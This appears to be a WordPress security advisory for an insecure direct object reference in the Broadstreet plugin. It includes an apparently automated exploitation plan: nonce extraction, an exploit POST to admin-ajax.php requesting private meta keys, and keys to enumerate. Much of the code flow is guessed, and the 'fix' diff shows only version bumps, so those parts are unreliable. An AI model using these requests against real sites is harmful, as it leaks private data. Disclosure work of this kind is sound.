Broadstreet <= 1.52.2 - Authenticated (Subscriber+) Private Post Meta Disclosure via get_sponsored_meta
Description
The Broadstreet plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.52.2 via the get_sponsored_meta AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disclose any private post metadata.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NTechnical Details
What Changed in the Fix
Changes introduced in v1.53.2
Source Code
WordPress.org SVNThis research plan targets a **Post Meta Disclosure (IDOR)** vulnerability in the Broadstreet plugin. While the full source of the AJAX handler is not provided in the snippet, the vulnerability description and common WordPress plugin patterns allow for a precise reconstruction of the exploitation pa…
Show full research plan
This research plan targets a Post Meta Disclosure (IDOR) vulnerability in the Broadstreet plugin. While the full source of the AJAX handler is not provided in the snippet, the vulnerability description and common WordPress plugin patterns allow for a precise reconstruction of the exploitation path.
1. Vulnerability Summary
The Broadstreet plugin registers an AJAX action get_sponsored_meta that lacks proper authorization and input validation. Specifically, it allows a user to provide an arbitrary key parameter which is passed directly to get_post_meta(). Because WordPress does not inherently protect "private" meta keys (those starting with an underscore) from get_post_meta calls when the key name is known, any authenticated user can bypass intended visibility restrictions to leak sensitive internal data.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
get_sponsored_meta - Vulnerable Parameter:
key(User-controlled meta key name) - Identifier Parameter:
post_id(The ID of the post to query) - Authentication: Subscriber level or higher.
- Preconditions: The attacker must have a valid
nonceif the plugin implementscheck_ajax_referer(likely), and the target meta key must exist for the specifiedpost_id.
3. Code Flow (Inferred)
- Registration:
Broadstreet_Core::execute()(inBroadstreet/Core.php) likely calls a method that registers the AJAX handler:add_action('wp_ajax_get_sponsored_meta', array($this, 'get_sponsored_meta')); - Handler Execution: The handler (presumably
get_sponsored_meta) retrieves input:$post_id = $_POST['post_id']; $meta_key = $_POST['key']; - The Sink: The code calls the native WordPress function without verifying if the key is public:
$value = get_post_meta($post_id, $meta_key, true); echo $value; wp_die(); - The Bypass: By providing a key like
_wp_attached_fileor a custom secret key (e.g.,_bs_metadata), the attacker receives data they shouldn't see.
4. Nonce Acquisition Strategy
Broadstreet typically localizes its configuration and nonces for its dashboard and widgets.
- Identify Script Localization: The plugin likely uses
wp_localize_scriptto pass a nonce to the frontend. Based on common Broadstreet patterns, the object name is likelyBroadstreetConfigorbroadstreet_vars. - Creation of Environment:
- Since Broadstreet is an ad-management plugin, its scripts usually load on the WordPress dashboard for all authenticated users.
- Extraction Steps:
- Log in as a Subscriber.
- Navigate to the WordPress Dashboard (
/wp-admin/index.php). - Use
browser_evalto search for the nonce:browser_eval("window.BroadstreetConfig?.nonce || window.broadstreet_vars?.nonce") - If not found, search the HTML source for
check_ajax_refereraction strings likebroadstreet_nonceorget_sponsored_meta.
5. Test Data Setup
To prove the vulnerability, we need a "private" meta key attached to a post.
- Create a target post:
wp post create --post_type=post --post_title="Target Post" --post_status=publish(Note the ID, e.g.,123). - Add private metadata:
wp post meta add 123 _secret_internal_key "CONFIDENTIAL_AD_REVENUE_DATA" - Create a Subscriber user:
wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
6. Exploitation Strategy
- Authentication: Authenticate as the Subscriber user and obtain session cookies.
- Nonce Retrieval:
- Navigate to
/wp-admin/usingbrowser_navigate. - Execute
browser_evalto extract thenonceand theajax_url.
- Navigate to
- Exploit Request:
- Use the
http_requesttool to send a POST request to/wp-admin/admin-ajax.php. - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
(Note: The parameter name for the nonce might beaction=get_sponsored_meta&post_id=123&key=_secret_internal_key&_wpnonce=[NONCE]nonceor_wpnonce; this should be verified during the extraction step.)
- Use the
7. Expected Results
- Success: The HTTP response body contains the string
CONFIDENTIAL_AD_REVENUE_DATA. - Response Code:
200 OK. - Security Failure: The plugin returns the value of a meta key prefixed with an underscore, which is the standard WordPress convention for protected/hidden metadata.
8. Verification Steps
- Verify Payload: Compare the HTTP response content with the output of:
wp post meta get 123 _secret_internal_key - Check Scope: Attempt to retrieve a core WordPress private key to show impact:
action=get_sponsored_meta&post_id=123&key=_edit_last
If it returns a User ID, the disclosure is confirmed.
9. Alternative Approaches
- If Nonce is not found in Admin: Some Broadstreet features are intended for the frontend. Create a page with a Broadstreet widget/shortcode (if identified via
grep -r "add_shortcode") and extract the nonce from the public-facing page. - Blind Disclosure: If the plugin does not
echothe result but uses it in a way that affects the UI, observe changes in the response length or specific HTML elements returned. - Key Enumeration: If the specific key name is unknown, common WordPress keys to test include:
_wp_attached_file_wp_page_template_edit_lock_edit_last
Summary
The Broadstreet plugin for WordPress is vulnerable to an authorization bypass via the `get_sponsored_meta` AJAX action due to missing validation on the user-controlled `key` parameter. This allows authenticated attackers with Subscriber-level access or higher to disclose any private post metadata by requesting keys that are typically hidden (prefixed with an underscore).
Security Fix
@@ -140,4 +140,4 @@ } } -define('BROADSTREET_VERSION', '1.53.1'); +define('BROADSTREET_VERSION', '1.53.2'); @@ -3,7 +3,7 @@ Plugin Name: Broadstreet Plugin URI: http://broadstreetads.com Description: Integrate Broadstreet business directory and adserving power into your site -Version: 1.53.1 +Version: 1.53.2 Tested up to: 6.9 Author: Broadstreet Author URI: http://broadstreetads.com @@ -3,7 +3,7 @@ Tags: broadstreet,local,publishers,hyperlocal,independent,news,business,directory Requires at least: 3.0 Tested up to: 6.9 -Stable tag: 1.53.1 +Stable tag: 1.53.2 Integrate Broadstreet adserving power into your site. Only in /home/deploy/wp-safety.org/data/plugin-versions/broadstreet/1.53.2: trunk
Exploit Outline
1. Authenticate as a Subscriber-level user to obtain valid session cookies. 2. Locate the AJAX nonce by extracting it from localized JavaScript variables on the WordPress dashboard (likely within 'broadstreet_vars' or 'BroadstreetConfig' objects). 3. Send a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'get_sponsored_meta'. 4. Include the target post ID in the 'post_id' parameter and the desired private metadata key in the 'key' parameter (e.g., '_wp_attached_file' or '_edit_last'). 5. Observe that the server returns the value of the requested private meta key, bypassing the standard WordPress protection for keys prefixed with an underscore.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.